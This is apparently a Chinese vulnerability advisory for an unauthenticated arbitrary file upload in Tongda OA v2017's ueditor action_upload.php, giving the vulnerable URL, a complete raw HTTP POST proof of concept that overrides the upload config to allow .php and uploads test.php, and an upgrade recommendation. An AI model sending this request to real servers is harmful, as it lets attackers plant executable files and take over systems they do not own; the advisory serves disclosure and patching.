漏洞验证-通达oa前台module/ueditor/php/action_upload.php任意文件上传

一、漏洞描述

通达OA v2017 action_upload.php 文件过滤不足且无需后台权限，导致任意文件上传漏洞。

二、漏洞URL

http://XXXX/module/ueditor/php/action_upload.php?action=uploadfile

三、漏洞POC

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1

Host: XXXX

Cache-Control: max-age=0

Accept-Language: zh-CN,zh;q=0.9

Upgrade-Insecure-Requests: 1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724

X_requested_with: XMLHttpRequest

Content-Length: 881

 

-----------------------------55719851240137822763221368724

Content-Disposition: form-data; name="CONFIG[fileFieldName]"

 

ffff

-----------------------------55719851240137822763221368724

Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

 

1000000000

-----------------------------55719851240137822763221368724

Content-Disposition: form-data; name="CONFIG[filePathFormat]"

 

tcmd

-----------------------------55719851240137822763221368724

Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

 

.php

-----------------------------55719851240137822763221368724

Content-Disposition: form-data; name="ffff"; filename="test.php"

Content-Type: application/octet-stream

 

123456

-----------------------------55719851240137822763221368724

Content-Disposition: form-data; name="mufile"

 

submit

-----------------------------55719851240137822763221368724--

 

四、漏洞验证

五、整改建议

1、联系官方进行升级到最新安全版本：https://www.tongda2000.com/。